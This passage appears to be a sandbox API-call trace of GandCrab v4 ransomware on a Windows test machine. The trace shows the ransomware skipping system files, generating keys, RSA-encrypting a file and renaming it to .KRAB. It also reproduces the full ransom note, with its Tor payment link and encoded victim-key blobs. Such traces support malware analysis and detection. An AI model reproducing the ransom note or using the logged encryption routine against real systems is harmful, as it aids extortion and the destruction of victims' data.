KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.880] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.881] CloseHandle (hObject=0x3ac) returned 1 [0060.881] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.882] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.882] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0x56)) [0060.882] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.882] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.882] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.882] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a08d2ca4dee3d.lock") returned 78 [0060.882] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0060.883] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.883] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.883] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\") returned 55 [0060.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\*" [0060.883] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd520 [0060.883] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.883] FindNextFileW (in: hFindFile=0xfbd520, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.883] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.883] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.884] FindNextFileW (in: hFindFile=0xfbd520, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.884] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.884] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.884] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a08d2ca4dee3d.lock" [0060.884] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.884] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 83 [0060.884] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\d2ca4a08d2ca4dee3d.lock") returned 78 [0060.884] lstrlenW (lpString=".lock") returned 5 [0060.884] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.884] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.884] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.884] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.885] FindNextFileW (in: hFindFile=0xfbd520, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.885] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.885] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.885] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\KRAB-DECRYPT.txt" [0060.885] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.885] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\KRAB-DECRYPT.txt.KRAB") returned 76 [0060.885] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\KRAB-DECRYPT.txt") returned 71 [0060.885] lstrlenW (lpString=".txt") returned 4 [0060.885] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.885] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.885] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\KRAB-DECRYPT.txt") returned 71 [0060.886] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\KRAB-DECRYPT.txt") returned 71 [0060.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.886] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.886] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.886] FindNextFileW (in: hFindFile=0xfbd520, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.886] lstrcmpW (lpString1="MSO1033.acl", lpString2=".") returned 1 [0060.886] lstrcmpW (lpString1="MSO1033.acl", lpString2="..") returned 1 [0060.886] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="MSO1033.acl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" [0060.886] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.886] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.KRAB") returned 71 [0060.887] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0060.887] lstrlenW (lpString=".acl") returned 4 [0060.887] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.887] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".acl ") returned 5 [0060.887] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.887] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0060.887] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 66 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="desktop.ini") returned 1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="autorun.inf") returned 1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ntuser.dat") returned -1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="iconcache.db") returned 1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="bootsect.bak") returned 1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="boot.ini") returned 1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ntuser.dat.log") returned -1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="thumbs.db") returned -1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="KRAB-DECRYPT.html") returned 1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="KRAB-DECRYPT.txt") returned 1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="CRAB-DECRYPT.txt") returned 1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="ntldr") returned -1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="NTDETECT.COM") returned -1 [0060.887] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Bootfont.bin") returned 1 [0060.888] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.888] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbb990) returned 1 [0060.888] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0060.889] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0060.889] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0060.889] CryptGenRandom (in: hProv=0xfbb990, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0060.889] CryptReleaseContext (hProv=0xfbb990, dwFlags=0x0) returned 1 [0060.889] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.889] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbbe58) returned 1 [0060.889] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0060.890] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0060.890] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0060.890] CryptGenRandom (in: hProv=0xfbbe58, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0060.890] CryptReleaseContext (hProv=0xfbbe58, dwFlags=0x0) returned 1 [0060.890] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.890] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbb4c8) returned 1 [0060.891] CryptImportKey (in: hProv=0xfbb4c8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd8e0) returned 1 [0060.891] CryptGetKeyParam (in: hKey=0xfbd8e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0060.891] CryptEncrypt (in: hKey=0xfbd8e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0060.891] GetLastError () returned 0x0 [0060.891] CryptDestroyKey (hKey=0xfbd8e0) returned 1 [0060.891] CryptReleaseContext (hProv=0xfbb4c8, dwFlags=0x0) returned 1 [0060.891] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbb440) returned 1 [0060.892] CryptImportKey (in: hProv=0xfbb440, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd6a0) returned 1 [0060.892] CryptGetKeyParam (in: hKey=0xfbd6a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0060.892] CryptEncrypt (in: hKey=0xfbd6a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0060.892] GetLastError () returned 0x0 [0060.892] CryptDestroyKey (hKey=0xfbd6a0) returned 1 [0060.892] CryptReleaseContext (hProv=0xfbb440, dwFlags=0x0) returned 1 [0060.892] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0060.893] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0060.893] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0060.894] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0x9362, lpOverlapped=0x0) returned 1 [0060.934] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xffff6c9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.934] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x9362, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0x9362, lpOverlapped=0x0) returned 1 [0060.934] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0060.934] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.938] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.938] CloseHandle (hObject=0x440) returned 1 [0060.943] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.943] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\mso1033.acl.krab")) returned 1 [0060.954] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.954] FindNextFileW (in: hFindFile=0xfbd520, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.954] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0060.954] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0060.954] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="Recent" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0060.954] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0060.954] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.955] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.955] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.955] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.955] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.955] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.955] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.955] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\KRAB-DECRYPT.txt") returned 79 [0060.955] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0060.961] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uH